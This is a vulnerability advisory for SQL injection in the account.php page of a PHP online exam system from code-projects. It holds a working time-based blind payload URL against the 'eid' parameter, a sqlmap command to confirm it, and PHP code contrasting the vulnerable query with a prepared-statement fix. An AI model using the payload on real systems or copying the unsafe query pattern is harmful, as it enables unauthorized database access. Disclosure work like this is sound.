# code-projects online-exam-mastering-system-php has sql injection in account.php
## Supplier
https://code-projects.org/online-exam-mastering-system-php/
## Description
The vulnerable code is in account.php:
### Code analysis
![image](https://hackmd.io/_uploads/ByaQaxXrJx.png)
The SQL Injection vulnerability here exists because the value of `$_GET['eid']` is directly embedded into the SQL queries without any validation or sanitization. If an attacker inputs malicious SQL code as the `eid` parameter, it will be executed by the database. For example, if `eid` is set to `'1' OR '1'='1'`, it could manipulate the query to return or modify unintended data. Always use **prepared statements** or **parameterized queries** to prevent this.
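As an added illustration (not the project's code, which is only shown in the screenshot above), the snippet below reconstructs the pattern the analysis describes, a `$_GET['eid']` value concatenated into a query string, next to a hardened version that validates the parameter and binds it with a prepared statement. The table name `exams`, the column name `eid`, the `mysqli` connection object and the hex format assumed for `eid` are all assumptions made for the example.

```php
<?php
// Added example, not code from the original page or project.
// Table/column names and the eid format are assumptions.

// --- Vulnerable pattern (illustrative reconstruction) ---
// The request parameter is spliced straight into the SQL text, so the
// database parses whatever the client sent as part of the statement.
function load_exam_unsafe(mysqli $db, array $get): ?array {
    $eid = $get['eid'] ?? '';                             // untrusted input
    $sql = "SELECT * FROM exams WHERE eid = '$eid'";      // string concatenation
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// --- Hardened pattern: validate, then bind ---
function load_exam_safe(mysqli $db, array $get): ?array {
    $eid = $get['eid'] ?? '';

    // 1. Reject anything that does not look like an exam id (assumed: hex token,
    //    up to 32 chars). A time-based payload such as `' AND (SELECT ... SLEEP(5))`
    //    never reaches the database.
    if (!preg_match('/^[a-f0-9]{1,32}$/', $eid)) {
        return null;
    }

    // 2. Parameterized query: the value is sent separately from the SQL text and
    //    is always treated as data, never as part of the statement.
    $stmt = $db->prepare("SELECT * FROM exams WHERE eid = ?");
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('s', $eid);
    $stmt->execute();
    $result = $stmt->get_result();          // requires the mysqlnd driver
    $row = $result ? $result->fetch_assoc() : null;
    $stmt->close();
    return $row ?: null;
}

// Usage sketch (connection details are placeholders):
// $db  = new mysqli('localhost', 'DB_USER', 'DB_PASS', 'DB_NAME');
// $row = load_exam_safe($db, $_GET);
```

Both steps matter: the allow-list check documents the expected input shape and fails fast, while the bound parameter is what actually removes the injection, so the second protection holds even if the validation regex is later loosened.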
## payload
```
http://host/account.php?q=quiz&step=2&eid=5589741f9ed52' AND (SELECT 9913 FROM (SELECT(SLEEP(5)))emka) AND 'nnHe'='nnHe&n=1&t=5
```
## Exploit
Use sqlmap to confirm the injection in the `eid` parameter:
```
sqlmap -u "/account.php?q=quiz&step=2&eid=5589741f9ed52&n=1&t=5" -p eid --batch
```
![image](https://hackmd.io/_uploads/S1kBTkmr1g.png)